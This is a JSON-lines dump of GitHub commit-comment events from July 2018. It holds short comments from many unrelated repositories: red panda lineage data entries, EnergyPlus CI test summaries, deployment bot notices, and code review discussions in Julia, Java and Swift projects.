{"id":"7965134364","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707579,"position":3,"line":3,"path":"pandas/0017_tama/0104_lala.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:34:53Z","updated_at":"2018-07-14T03:34:53Z","author_association":"CONTRIBUTOR","body":"2008/6/16"}},"created_at":"2018-07-14T03:34:53Z"}
{"id":"7965134872","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707580,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-14T03:35:22Z","updated_at":"2018-07-14T03:35:22Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T03:35:22Z"}
{"id":"7965135261","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707581,"position":4,"line":4,"path":"pandas/0017_tama/0104_lala.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:35:44Z","updated_at":"2018-07-14T03:35:44Z","author_association":"CONTRIBUTOR","body":"Chausuyama Zoo"}},"created_at":"2018-07-14T03:35:44Z"}
{"id":"7965135875","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707583,"position":5,"line":5,"path":"pandas/0017_tama/0104_lala.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:36:20Z","updated_at":"2018-07-14T03:36:20Z","author_association":"CONTRIBUTOR","body":"Rairai(Tohoku Safari)"}},"created_at":"2018-07-14T03:36:20Z"}
{"id":"7965136440","type":"CommitCommentEvent","actor":{"login":"seegyoung"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29707584,"position":43,"line":57,"path":"mds/apfPM.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-14T03:36:54Z","updated_at":"2018-07-14T03:36:54Z","author_association":"CONTRIBUTOR","body":"yes of course - my apologies, I was in a rush to check in the code so ES can use it asap."}},"created_at":"2018-07-14T03:36:54Z"}
{"id":"7965137771","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707586,"position":3,"line":3,"path":"pandas/0017_tama/0105_runrun.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:38:10Z","updated_at":"2018-07-14T03:38:10Z","author_association":"CONTRIBUTOR","body":"2007/6/28"}},"created_at":"2018-07-14T03:38:10Z"}
{"id":"7965138129","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707587,"position":4,"line":4,"path":"pandas/0017_tama/0105_runrun.txt","commit_id":"c295673c1778a6bece40fab8a9ad3701275139f5","created_at":"2018-07-14T03:38:28Z","updated_at":"2018-07-14T03:38:28Z","author_association":"CONTRIBUTOR","body":"Tama Zoo"}},"created_at":"2018-07-14T03:38:28Z"}
{"id":"7965138993","type":"CommitCommentEvent","actor":{"login":"xueyou2000"},"repo":{"name":"xueyou2000/DataMappin"},"payload":{"comment":{"id":29707590,"position":null,"line":null,"path":null,"commit_id":"5ef9503ce6a07d1e4f9eaa966b1964172c2ef4b7","created_at":"2018-07-14T03:39:21Z","updated_at":"2018-07-14T03:39:21Z","author_association":"OWNER","body":"github啊"}},"created_at":"2018-07-14T03:39:21Z"}
{"id":"7965139284","type":"CommitCommentEvent","actor":{"login":"basantpatidar"},"repo":{"name":"basantpatidar/php-codes"},"payload":{"comment":{"id":29707593,"position":null,"line":null,"path":null,"commit_id":"bc4c3e31b2479972cbc045be7578a5695aa15e05","created_at":"2018-07-14T03:39:39Z","updated_at":"2018-07-14T03:39:39Z","author_association":"OWNER","body":"A simple program to print string"}},"created_at":"2018-07-14T03:39:39Z"}
{"id":"7965140117","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29707594,"position":20,"line":20,"path":"src/Animation.java","commit_id":"e2ac71c1fb0527f2ed179f4b1c90c4031f30caef","created_at":"2018-07-14T03:40:28Z","updated_at":"2018-07-14T03:40:28Z","author_association":"CONTRIBUTOR","body":"I think someone accidentally moved the wrong thing. That was supposed to be in the Renderer class."}},"created_at":"2018-07-14T03:40:28Z"}
{"id":"7965140207","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707595,"position":null,"line":null,"path":null,"commit_id":"ea744ee28374298283a237e23a9837d667abe50a","created_at":"2018-07-14T03:40:33Z","updated_at":"2018-07-14T03:40:33Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea744ee28374298283a237e23a9837d667abe50a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T03:40:33Z"}
{"id":"7965142236","type":"CommitCommentEvent","actor":{"login":"wwoast"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707599,"position":5,"line":5,"path":"pandas/0038_nogeyama/0126_kenken.txt","commit_id":"81a53fc0032eac3d78991c50599505e535dbe9c3","created_at":"2018-07-14T03:42:26Z","updated_at":"2018-07-14T03:42:26Z","author_association":"OWNER","body":"http://www.tobezoophoto.jp/kotai.asp?id=1"}},"created_at":"2018-07-14T03:42:26Z"}
{"id":"7965143126","type":"CommitCommentEvent","actor":{"login":"geraldvillorente"},"repo":{"name":"geraldvillorente/build-tools-demo"},"payload":{"comment":{"id":29707600,"position":null,"line":null,"path":null,"commit_id":"341986d9a36149f6da849d876db4285d4b6a4488","created_at":"2018-07-14T03:43:24Z","updated_at":"2018-07-14T03:43:24Z","author_association":"OWNER","body":"Created multidev environment [build-tools-demo#ci-6](https://dashboard.pantheon.io/sites/298d3692-c016-408b-972b-854d0b0302a9#ci-6).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-6-build-tools-demo.pantheonsite.io/)"}},"created_at":"2018-07-14T03:43:24Z"}
{"id":"7965143350","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707601,"position":4,"line":3,"path":"pandas/0001_ichikawa/0005_mugi.txt","commit_id":"51889cc06073f39d75f3b81c4b137336d68a9316","created_at":"2018-07-14T03:43:38Z","updated_at":"2018-07-14T03:43:38Z","author_association":"CONTRIBUTOR","body":"2018/7/13"}},"created_at":"2018-07-14T03:43:38Z"}
{"id":"7965143616","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29707602,"position":1,"line":null,"path":"1531539833.14/github_test.txt","commit_id":"57fce78b63ca584522979ea71b3ee87c301890fe","created_at":"2018-07-14T03:43:55Z","updated_at":"2018-07-14T03:43:55Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-14T03:43:55Z"}
{"id":"7965143881","type":"CommitCommentEvent","actor":{"login":"hachi-firefoxpanda"},"repo":{"name":"wwoast/redpanda-lineage"},"payload":{"comment":{"id":29707603,"position":5,"line":4,"path":"pandas/0001_ichikawa/0005_mugi.txt","commit_id":"51889cc06073f39d75f3b81c4b137336d68a9316","created_at":"2018-07-14T03:44:08Z","updated_at":"2018-07-14T03:44:08Z","author_association":"CONTRIBUTOR","body":"Kyoto Zoo"}},"created_at":"2018-07-14T03:44:08Z"}
{"id":"7965146506","type":"CommitCommentEvent","actor":{"login":"i7eve"},"repo":{"name":"i7eve/CodeSquad-Projects"},"payload":{"comment":{"id":29707609,"position":2,"line":1,"path":"README.md","commit_id":"5ca165d15a56611a1a3daaa5d25e5fa486d76b93","created_at":"2018-07-14T03:46:40Z","updated_at":"2018-07-14T03:46:40Z","author_association":"OWNER","body":"My first web app"}},"created_at":"2018-07-14T03:46:40Z"}
{"id":"7965147467","type":"CommitCommentEvent","actor":{"login":"jlperla"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707610,"position":20,"line":23,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T03:47:36Z","updated_at":"2018-07-14T03:47:36Z","author_association":"CONTRIBUTOR","body":"Remove it, no use "}},"created_at":"2018-07-14T03:47:36Z"}
{"id":"7965148526","type":"CommitCommentEvent","actor":{"login":"scoutman57"},"repo":{"name":"laravel/homestead"},"payload":{"comment":{"id":29707612,"position":null,"line":null,"path":null,"commit_id":"ce857d3aac3b94857da74cf44081c7114757a77d","created_at":"2018-07-14T03:48:41Z","updated_at":"2018-07-14T03:48:41Z","author_association":"CONTRIBUTOR","body":"I just tested these, and it worked as expected. Thanks for such a quick fix! Just curious, in your testing after did you notice differences in times? "}},"created_at":"2018-07-14T03:48:41Z"}
{"id":"7965149261","type":"CommitCommentEvent","actor":{"login":"jlperla"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707613,"position":15,"line":19,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T03:49:28Z","updated_at":"2018-07-14T03:49:28Z","author_association":"CONTRIBUTOR","body":"This doesn't make sense, remove it. Gaussian quadrature is typically specific to a particular distribution. So add in a stub `Normal` for now "}},"created_at":"2018-07-14T03:49:28Z"}
{"id":"7965149334","type":"CommitCommentEvent","actor":{"login":"geeknik"},"repo":{"name":"mapbox/protozero"},"payload":{"comment":{"id":29707614,"position":null,"line":null,"path":null,"commit_id":"ac48bc1915f74aebd90324b45ffe9b696229391b","created_at":"2018-07-14T03:49:32Z","updated_at":"2018-07-14T03:49:32Z","author_association":"NONE","body":"I noticed another place where the same exact issue is happening and I haven't figured out where exactly to patch it yet.\r\n\r\n```\r\n./vtzero-stats test.mvt\r\nterminate called after throwing an instance of 'protozero::end_of_buffer_exception'\r\n  what():  end of buffer exception\r\nAborted\r\n```"}},"created_at":"2018-07-14T03:49:32Z"}
{"id":"7965150590","type":"CommitCommentEvent","actor":{"login":"svpernova09"},"repo":{"name":"laravel/homestead"},"payload":{"comment":{"id":29707616,"position":null,"line":null,"path":null,"commit_id":"ce857d3aac3b94857da74cf44081c7114757a77d","created_at":"2018-07-14T03:50:49Z","updated_at":"2018-07-14T03:50:49Z","author_association":"MEMBER","body":"I’m currently traveling and only have access to my newer MacBook Pro so was only able to test on it. Did not see much speed different in my sample app.\n\n--\n- Joe Ferguson\nJoeFerguson.me\nMemphisPHP.org\nOn Jul 13, 2018, 23:48 -0400, Shannon Warren <notifications@github.com>, wrote:\n> I just tested these, and it worked as expected. Thanks for such a quick fix! Just curious, in your testing after did you notice differences in times?\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-14T03:50:49Z"}
{"id":"7965152127","type":"CommitCommentEvent","actor":{"login":"mbrenesj"},"repo":{"name":"mbrenesj/Quiniela"},"payload":{"comment":{"id":29707618,"position":null,"line":null,"path":null,"commit_id":"90286bdef322e57615e11bf3ce445dd7869a9489","created_at":"2018-07-14T03:52:23Z","updated_at":"2018-07-14T03:52:23Z","author_association":"OWNER","body":"Prueba 4 c"}},"created_at":"2018-07-14T03:52:23Z"}
{"id":"7965153823","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707619,"position":15,"line":19,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T03:54:04Z","updated_at":"2018-07-14T03:54:04Z","author_association":"COLLABORATOR","body":"OK"}},"created_at":"2018-07-14T03:54:04Z"}
{"id":"7965153975","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707620,"position":20,"line":23,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T03:54:12Z","updated_at":"2018-07-14T03:54:12Z","author_association":"COLLABORATOR","body":"OK"}},"created_at":"2018-07-14T03:54:12Z"}
{"id":"7965153992","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29707621,"position":null,"line":null,"path":null,"commit_id":"19ac390c53b612bf4e188fb90e5971799d47ed17","created_at":"2018-07-14T03:54:13Z","updated_at":"2018-07-14T03:54:13Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T03:54:13Z"}
{"id":"7965154775","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29707622,"position":null,"line":null,"path":null,"commit_id":"0385d2e3742a678901786027a3085c43cc8f3222","created_at":"2018-07-14T03:54:55Z","updated_at":"2018-07-14T03:54:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-035453 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-035453\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-14T03:54:55Z"}
{"id":"7965155204","type":"CommitCommentEvent","actor":{"login":"darshanswami"},"repo":{"name":"darshanswami/gitactivity"},"payload":{"comment":{"id":29707624,"position":null,"line":null,"path":null,"commit_id":"bff89ca0e42a82504341aaf0394ae8076e6b441b","created_at":"2018-07-14T03:55:18Z","updated_at":"2018-07-14T03:55:18Z","author_association":"OWNER","body":"People can understand project by this file."}},"created_at":"2018-07-14T03:55:18Z"}
{"id":"7965155211","type":"CommitCommentEvent","actor":{"login":"Yanjingzhu"},"repo":{"name":"Yanjingzhu/YanGitRepo"},"payload":{"comment":{"id":29707625,"position":4,"line":32,"path":"GitSolution/GitSolution/Program.cs","commit_id":"be7e44baf56e474a3133ae2d3466c4c22ba0a705","created_at":"2018-07-14T03:55:19Z","updated_at":"2018-07-14T03:55:19Z","author_association":"OWNER","body":"gggg"}},"created_at":"2018-07-14T03:55:19Z"}
{"id":"7965155661","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29707626,"position":null,"line":null,"path":null,"commit_id":"bee0b95c2d0f52152e7534d046e7d375651d0ca9","created_at":"2018-07-14T03:55:46Z","updated_at":"2018-07-14T03:55:46Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-14T03:55:46Z"}
{"id":"7965157158","type":"CommitCommentEvent","actor":{"login":"Yanjingzhu"},"repo":{"name":"yanOrganizRenameAgain/YanGitRepo"},"payload":{"comment":{"id":29707629,"position":2,"line":1,"path":"GitSolution/GitSolution/test.txt","commit_id":"b39df90a5c7fb19fd3fd8f9d050497e4e40532a1","created_at":"2018-07-14T03:57:11Z","updated_at":"2018-07-14T03:57:11Z","author_association":"NONE","body":"hjhjhj"}},"created_at":"2018-07-14T03:57:11Z"}
{"id":"7965158098","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29707630,"position":null,"line":null,"path":null,"commit_id":"19ac390c53b612bf4e188fb90e5971799d47ed17","created_at":"2018-07-14T03:58:09Z","updated_at":"2018-07-14T03:58:09Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T03:58:09Z"}
{"id":"7965158326","type":"CommitCommentEvent","actor":{"login":"Yanjingzhu"},"repo":{"name":"yanOrganizRenameAgain/YanGitRepo"},"payload":{"comment":{"id":29707631,"position":1,"line":1,"path":"GitSolution/GitSolution/test.txt","commit_id":"b39df90a5c7fb19fd3fd8f9d050497e4e40532a1","created_at":"2018-07-14T03:58:21Z","updated_at":"2018-07-14T03:58:21Z","author_association":"NONE","body":"ysn iiiii"}},"created_at":"2018-07-14T03:58:21Z"}
{"id":"7965158579","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapbox/protozero"},"payload":{"comment":{"id":29707632,"position":null,"line":null,"path":null,"commit_id":"ac48bc1915f74aebd90324b45ffe9b696229391b","created_at":"2018-07-14T03:58:35Z","updated_at":"2018-07-14T03:58:35Z","author_association":"MEMBER","body":"I’m on mobile right now so I can’t check the code. But is either not using a try/catch anywhere in the code, or it needs the same fix as tippecanoe (to catch the base exception type) I would presume. "}},"created_at":"2018-07-14T03:58:35Z"}
{"id":"7965159127","type":"CommitCommentEvent","actor":{"login":"Sod-Momas"},"repo":{"name":"Sod-Momas/weSay-java"},"payload":{"comment":{"id":29707633,"position":null,"line":null,"path":null,"commit_id":"805086a4032f152b2c5b1502f92e694f696a2fad","created_at":"2018-07-14T03:59:09Z","updated_at":"2018-07-14T03:59:09Z","author_association":"OWNER","body":"这个版本大改了些东西，\r\n\r\n- 导致在线人数无法使用\r\n- 发布时的url还未兼容\r\n- 消息拉取未美化 \r\n"}},"created_at":"2018-07-14T03:59:09Z"}
{"id":"7965159196","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29707634,"position":137,"line":295,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-14T03:59:13Z","updated_at":"2018-07-14T03:59:13Z","author_association":"MEMBER","body":"I am not following, why is `setConsole` broken? Maybe I missed something....\r\n\r\n>  I do not want that someone else arbitrarily can control the streams.\r\n\r\nHow do you see this happening? It is an instance method so they first need to gain access to that instance before any changes to console will affect you. How is this different to `setOut`, `setErr` ?...or how you are currently \"resetting the parser\", I thought this would be a nice alternative, I am sure changing he `in` stream on the console and then resetting the parser here wire have the same affect. \r\n\r\nWhat I tried to accomplish was centralising the functionality, you will notice the constructor also calls this method to init the parser. Another similar thing is happening to the setNamespace method which also inits the root system if required. \r\n\r\n`setConsole` is unfortunately public so we are stuck with it for some time. Only way to get rid of it for good would be to mark it deprecated for several releases first, then we can remove it.  Is this what you'd prefer?...for it to not be used anymore? Or are you only concerned because it updates the console reference? You do see that if you call that method twice you still use the same instance of console that you sent the first time. It only wraps your `ConsoleInterface` implementation with a `ConsoleAssignable` which delegates functionality to the wrapped class again. \r\n\r\nI don't know I think it has possibilities.. but as I said before maybe I am not seeing something."}},"created_at":"2018-07-14T03:59:13Z"}
{"id":"7965161062","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707644,"position":15,"line":19,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T04:00:39Z","updated_at":"2018-07-14T04:00:39Z","author_association":"COLLABORATOR","body":"Wait, this is the catchall error method (e.g., throw an error if you try choosing Gaussian for something not specifically implemented). Why isn’t that useful?"}},"created_at":"2018-07-14T04:00:39Z"}
{"id":"7965161686","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MunifTanjim/minimo"},"payload":{"comment":{"id":29707645,"position":null,"line":null,"path":null,"commit_id":"4f6e0e9fe8843faa78f602b128f7c8beab2f9c94","created_at":"2018-07-14T04:01:09Z","updated_at":"2018-07-14T04:01:09Z","author_association":"NONE","body":"Would be interesting to see one of these static commenting systems integrate with `git-notes` so the comments were portable. Do either of these systems implement a means to extract existing notes?"}},"created_at":"2018-07-14T04:01:09Z"}
{"id":"7965162647","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"Mygod/VPNHotspot"},"payload":{"comment":{"id":29707647,"position":null,"line":null,"path":null,"commit_id":"33cd906f6559b802f200804b4d7812cb144e5d68","created_at":"2018-07-14T04:01:55Z","updated_at":"2018-07-14T04:01:55Z","author_association":"OWNER","body":"I see. No need for that, it's fine. Thanks!"}},"created_at":"2018-07-14T04:01:55Z"}
{"id":"7965163516","type":"CommitCommentEvent","actor":{"login":"geraldvillorente"},"repo":{"name":"geraldvillorente/build-tools-demo"},"payload":{"comment":{"id":29707648,"position":null,"line":null,"path":null,"commit_id":"8eaff2e0865657417a2b1bb2e371f6b348c6b8d9","created_at":"2018-07-14T04:02:45Z","updated_at":"2018-07-14T04:02:45Z","author_association":"OWNER","body":"Created multidev environment [build-tools-demo#ci-7](https://dashboard.pantheon.io/sites/298d3692-c016-408b-972b-854d0b0302a9#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-build-tools-demo.pantheonsite.io/)"}},"created_at":"2018-07-14T04:02:45Z"}
{"id":"7965166568","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29707652,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-14T04:05:41Z","updated_at":"2018-07-14T04:05:41Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2373 of 2935 tests passed, 61 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 558 tests had: Table big diffs.\n * 76 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 168 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 101 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 17 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 61\n * Failed: 562\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.85%25-red.png)</a> \n"}},"created_at":"2018-07-14T04:05:41Z"}
{"id":"7965166757","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29707653,"position":null,"line":null,"path":null,"commit_id":"19ac390c53b612bf4e188fb90e5971799d47ed17","created_at":"2018-07-14T04:05:51Z","updated_at":"2018-07-14T04:05:51Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T04:05:51Z"}
{"id":"7965167167","type":"CommitCommentEvent","actor":{"login":"nathantannar4"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29707654,"position":20,"line":133,"path":"Sources/Layout/MessagesCollectionViewFlowLayout.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T04:06:17Z","updated_at":"2018-07-14T04:06:17Z","author_association":"MEMBER","body":"Good point, I suppose a user would have to override `collectionView(... numberOfItemsIn section: Int)->Int`, this is just a function used to help know when its safe to call from the `MessageDataSource` or not"}},"created_at":"2018-07-14T04:06:17Z"}
{"id":"7965167499","type":"CommitCommentEvent","actor":{"login":"nathantannar4"},"repo":{"name":"MessageKit/MessageKit"},"payload":{"comment":{"id":29707655,"position":28,"line":28,"path":"Sources/Layout/TypingMessageSizeCalculator.swift","commit_id":"6a556fe57fd3f3767334173168c6e09ef85a28cb","created_at":"2018-07-14T04:06:38Z","updated_at":"2018-07-14T04:06:38Z","author_association":"MEMBER","body":"Ya I left it like that just for consistency "}},"created_at":"2018-07-14T04:06:38Z"}
{"id":"7965168448","type":"CommitCommentEvent","actor":{"login":"jlperla"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707657,"position":15,"line":19,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T04:07:36Z","updated_at":"2018-07-14T04:07:36Z","author_association":"CONTRIBUTOR","body":"No.  With multiple dispatch you don't put in errors for choosing something not implemented or meaningful, you just don't implement it.  Among (many) reasons, having these errors mucks up putting in generic code later."}},"created_at":"2018-07-14T04:07:36Z"}
{"id":"7965169006","type":"CommitCommentEvent","actor":{"login":"Amitdutta121"},"repo":{"name":"Amitdutta121/Ecommerce_Solution"},"payload":{"comment":{"id":29707659,"position":null,"line":null,"path":null,"commit_id":"a2aa3b6e3e94f9784cbf38e22f3e973ca98284ed","created_at":"2018-07-14T04:08:12Z","updated_at":"2018-07-14T04:08:12Z","author_association":"OWNER","body":"Sql database file"}},"created_at":"2018-07-14T04:08:12Z"}
{"id":"7965169183","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29707660,"position":137,"line":295,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-14T04:08:21Z","updated_at":"2018-07-14T04:08:21Z","author_association":"MEMBER","body":"> because to me this refactory does not bring many benefits if we do not redesign Interpreter.\r\n\r\n176 deletions, to me it went a long way to cleaning up Interpreter, let it focus on what it is supposed to do and  removing the console stuff from it. As far as refactors go (refactor does not change the existing functionality) it managed to accomplish very much."}},"created_at":"2018-07-14T04:08:21Z"}
{"id":"7965169708","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"econtoolkit/Expectations.jl"},"payload":{"comment":{"id":29707663,"position":15,"line":19,"path":"src/lib/continuous.jl","commit_id":"a80e9d2b8a9fc98ec04b5636af80efd18b9faf7c","created_at":"2018-07-14T04:08:52Z","updated_at":"2018-07-14T04:08:52Z","author_association":"COLLABORATOR","body":"OK, good to know."}},"created_at":"2018-07-14T04:08:52Z"}
{"id":"7965169984","type":"CommitCommentEvent","actor":{"login":"HelenaSILS"},"repo":{"name":"patricia-777/TR2-proxy"},"payload":{"comment":{"id":29707665,"position":null,"line":null,"path":null,"commit_id":"a62ce070f551fc2d72ba1a613bdb45f11521efc8","created_at":"2018-07-14T04:09:10Z","updated_at":"2018-07-14T04:09:10Z","author_association":"COLLABORATOR","body":"Favor, fazer download, pois a leitura de pdf aqui não é possivel"}},"created_at":"2018-07-14T04:09:10Z"}
